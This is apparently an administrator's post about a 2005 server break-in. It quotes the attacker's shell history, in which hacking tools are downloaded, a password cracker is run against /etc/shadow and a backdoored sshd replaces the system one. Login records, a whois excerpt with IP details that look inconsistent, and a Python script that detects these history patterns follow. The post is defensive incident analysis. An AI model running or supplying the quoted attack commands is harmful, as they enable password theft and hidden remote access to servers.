SSH compiled with backdoor
One of my web servers was hacked on July 17, 2005. bash_history showed:
wget geocities.com/cretu_2004/john-1.6.tar.gz;tar zxvf john-1.6.tar.gz;rm -rf john-1.6.tar.gz;cd john-1.6/src;make linux-x86-any-elf;cd ../run;./john /etc/shadow
wget www.geocities.com/securedro/sshd.tar.gz;tar -xzf sshd.tar.gz;rm -rf sshd.tar.gz;cd sshd;cd apps/ssh
cp /usr/sbin/sshd a
mv a /lib/java
rm -rf /usr/sbin/sshd
cp /usr/local/sbin/sshd /usr/sbin
According to john, a couple of users had weak passwords, but root seemed well protected. From looking in all the bash_history, it appears the hacker came in from the website account, and did an su from there.
I found this about a month later when I logged into the box, did an ls, only to be met by a seg fault. A ps x showed mech.tgz trying to be downloaded, and a bunch of other CRON processes running. The auth log didn't show other logins, though, so the ssh installed must have logging turned off for the backdoor they installed.
I filled out an abuse form at geocities for the accounts hosting the software after downloading the software (I couldn't find the tgz files on my system).
reboot system boot 2.4.18-bf2.4 Sun Jul 17 18:15 (37+11:47)
website pts/0 188.8.131.52 Sun Jul 17 17:42 - down (00:27)
website pts/1 184.108.40.206 Sun Jul 17 17:05 - 17:26 (00:20)
website pts/0 220.127.116.11 Sun Jul 17 16:26 - 17:41 (01:14)
inetnum: 18.104.22.168 - 22.214.171.124
descr: Starnets - Datanet
address: DATA NET
address: Str. Ioan N. Roman Nr. 13
address: Constanta, cod 900199, ROMANIA
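As an added example, not part of the original post: a small Python checker that flags the three patterns visible in the quoted bash_history (a tool run against /etc/shadow, an archive downloaded and then deleted in the same command row, and cp/mv/rm touching a system binary directory). The sample history is constructed from the lines in the post; the rule names and the SYSTEM_DIRS list are assumptions.

```python
import os
import re
import shlex

# Constructed sample modelled on the bash_history quoted in the post: one command
# row per line, as bash writes it (assumption: no HISTTIMEFORMAT timestamps).
SAMPLE_HISTORY = """\
ls -la
wget geocities.com/cretu_2004/john-1.6.tar.gz;tar zxvf john-1.6.tar.gz;rm -rf john-1.6.tar.gz;cd john-1.6/src;make linux-x86-any-elf;cd ../run;./john /etc/shadow
wget www.geocities.com/securedro/sshd.tar.gz;tar -xzf sshd.tar.gz;rm -rf sshd.tar.gz;cd sshd;cd apps/ssh
cp /usr/sbin/sshd a
mv a /lib/java
rm -rf /usr/sbin/sshd
cp /usr/local/sbin/sshd /usr/sbin
"""

# Directories where a cp/mv/rm typed at an interactive shell deserves a second look (assumed list).
SYSTEM_DIRS = ("/bin/", "/sbin/", "/usr/bin/", "/usr/sbin/", "/lib/")

def in_system_dir(path):
    """True if path is one of SYSTEM_DIRS itself or lies inside one of them."""
    return any(path == d.rstrip("/") or path.startswith(d) for d in SYSTEM_DIRS)

def split_commands(row):
    """Split one history row on ';', '&&', '||' or '|' into tokenised commands."""
    cmds = []
    for part in re.split(r";|&&|\|\|?", row):
        try:
            argv = shlex.split(part)
        except ValueError:          # unbalanced quotes: fall back to a whitespace split
            argv = part.split()
        if argv:
            cmds.append(argv)
    return cmds

def scan_history(text):
    """Return (row_number, rule, command) triples for the indicators seen in the post."""
    findings = []
    for row_no, row in enumerate(text.splitlines(), 1):
        cmds = split_commands(row)
        # basenames of everything fetched in this row, to pair with a later rm of the archive
        fetched = {os.path.basename(a) for c in cmds if c[0] in ("wget", "curl")
                   for a in c[1:] if not a.startswith("-")}
        for argv in cmds:
            name, args = argv[0], argv[1:]
            if "/etc/shadow" in args:                       # password hashes read by a user tool
                findings.append((row_no, "shadow_access", " ".join(argv)))
            if name == "rm" and any(os.path.basename(a) in fetched for a in args):
                findings.append((row_no, "fetch_and_delete", " ".join(argv)))
            if name in ("cp", "mv", "rm") and any(in_system_dir(a) for a in args):
                findings.append((row_no, "system_binary_tamper", " ".join(argv)))
    return findings

if __name__ == "__main__":
    for row_no, rule, cmd in scan_history(SAMPLE_HISTORY):
        print(f"row {row_no}: {rule}: {cmd}")
```

Run it over each user's .bash_history on the box; the rows it flags are the same ones the post reproduces, and a hit on the sshd path is the cue to compare /usr/sbin/sshd against the package manager's copy.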